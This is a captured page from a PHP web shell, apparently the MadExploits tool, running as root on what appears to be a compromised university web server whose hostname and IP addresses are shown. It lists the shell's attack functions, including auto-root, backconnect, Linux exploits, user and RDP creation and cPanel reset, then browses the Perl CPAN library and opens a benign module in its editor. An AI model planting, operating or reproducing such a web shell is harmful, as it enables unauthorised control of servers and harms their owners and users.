Linux web-conference.aiou.edu.pk 5.4.0-205-generic #225-Ubuntu SMP Fri Jan 10 22:23:35 UTC 2025 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.223.196.16
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
perl /
5.30.0 /
CPAN /
[ HOME SHELL ]
Name
Size
Permission
Action
API
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
FTP
[ DIR ]
drwxr-xr-x
HTTP
[ DIR ]
drwxr-xr-x
Kwalify
[ DIR ]
drwxr-xr-x
LWP
[ DIR ]
drwxr-xr-x
Meta
[ DIR ]
drwxr-xr-x
Plugin
[ DIR ]
drwxr-xr-x
Author.pm
6.68
KB
-rw-r--r--
Bundle.pm
9.6
KB
-rw-r--r--
CacheMgr.pm
7.48
KB
-rw-r--r--
Complete.pm
5.88
KB
-rw-r--r--
Debug.pm
2.05
KB
-rw-r--r--
DeferredCode.pm
189
B
-rw-r--r--
Distribution.pm
165.88
KB
-rw-r--r--
Distroprefs.pm
11.71
KB
-rw-r--r--
Distrostatus.pm
972
B
-rw-r--r--
FTP.pm
41.96
KB
-rw-r--r--
FirstTime.pm
70.16
KB
-rw-r--r--
HandleConfig.pm
22.75
KB
-rw-r--r--
Index.pm
21.7
KB
-rw-r--r--
InfoObj.pm
6.75
KB
-rw-r--r--
Kwalify.pm
3.35
KB
-rw-r--r--
Meta.pm
29.56
KB
-rw-r--r--
Mirrors.pm
16.31
KB
-rw-r--r--
Module.pm
21.87
KB
-rw-r--r--
Nox.pm
953
B
-rw-r--r--
Plugin.pm
3.14
KB
-rw-r--r--
Prompt.pm
567
B
-rw-r--r--
Queue.pm
6.78
KB
-rw-r--r--
Shell.pm
71.89
KB
-rw-r--r--
Tarzip.pm
16.32
KB
-rw-r--r--
URL.pm
588
B
-rw-r--r--
Version.pm
4.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Distrostatus.pm
# -*- Mode: cperl; coding: utf-8; cperl-indent-level: 4 -*- # vim: ts=4 sts=4 sw=4: package CPAN::Distrostatus; use overload '""' => "as_string", fallback => 1; use vars qw($something_has_failed_at); use vars qw( $VERSION ); $VERSION = "5.5"; sub new { my($class,$arg) = @_; my $failed = substr($arg,0,2) eq "NO"; if ($failed) { $something_has_failed_at = $CPAN::CurrentCommandId; } bless { TEXT => $arg, FAILED => $failed, COMMANDID => $CPAN::CurrentCommandId, TIME => time, }, $class; } sub something_has_just_failed () { defined $something_has_failed_at && $something_has_failed_at == $CPAN::CurrentCommandId; } sub commandid { shift->{COMMANDID} } sub failed { shift->{FAILED} } sub text { my($self,$set) = @_; if (defined $set) { $self->{TEXT} = $set; } $self->{TEXT}; } sub as_string { my($self) = @_; $self->text; } 1;
Close